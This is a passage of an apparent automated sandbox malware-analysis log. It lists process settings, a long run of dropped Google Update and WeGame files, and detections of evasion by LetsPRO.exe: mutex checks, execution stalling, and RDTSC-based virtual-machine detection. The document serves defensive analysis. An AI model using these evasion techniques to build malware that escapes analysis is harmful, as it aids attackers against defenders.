                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Found evasive API chain (may stop execution after checking mutex)
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_4-11474
                  Found evasive API chain checking for user administrative privileges
                  Source: C:\Program Files (x86)\ChromeSetup.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNode
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNode
                  Found stalling execution ending in API Sleep call
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeStalling execution: Execution stalls by calling Sleepgraph_4-11259
                  Tries to evade analysis by execution special instruction (VM detection)
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSpecial instruction interceptor: First address: 10D98209 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeWindow / User API: threadDelayed 656Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeWindow / User API: threadDelayed 460Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeWindow / User API: threadDelayed 2633Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeWindow / User API: threadDelayed 3264Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeWindow / User API: threadDelayed 1615Jump to behavior
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sw.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_it.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler64.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ca.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_nl.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ta.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hu.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ro.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_am.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sv.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ml.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\psmachine_64.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ur.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-CN.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_vi.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_is.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pt-PT.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fr.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\psmachine.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_iw.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_da.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_kn.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_et.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_no.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_te.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sk.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\psmachine_64.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdate.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_en.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ko.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ja.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\psuser_64.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\WeGame\beacon_sdk.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es-419.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sl.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ms.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler64.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fil.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_zh-CN.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_mr.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fa.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sr.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lt.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ms.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bg.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fil.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fi.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_id.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_no.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-PT.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pl.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\WeGame\common.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIB59C.tmpJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fr.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcp100.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_cs.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_gu.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_uk.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_th.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_de.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_tr.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hr.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ru.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIB54D.tmpJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hi.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sw.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ca.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_nl.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ro.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_it.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hu.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ta.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_vi.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateOnDemand.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sv.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sl.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_en-GB.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ko.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-BR.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_es.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIB404.tmpJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_uk.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sk.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lv.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_zh-TW.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_da.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\psuser.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bn.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ml.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_te.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pl.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ar.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_iw.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIB5FB.tmpJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ur.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateBroker.exeJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-TW.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_et.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_kn.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ja.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_lt.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_el.dllJump to dropped file
                  Source: C:\Program Files (x86)\ChromeSetup.exeDropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bg.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateBroker.exeJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_mr.dllJump to dropped file
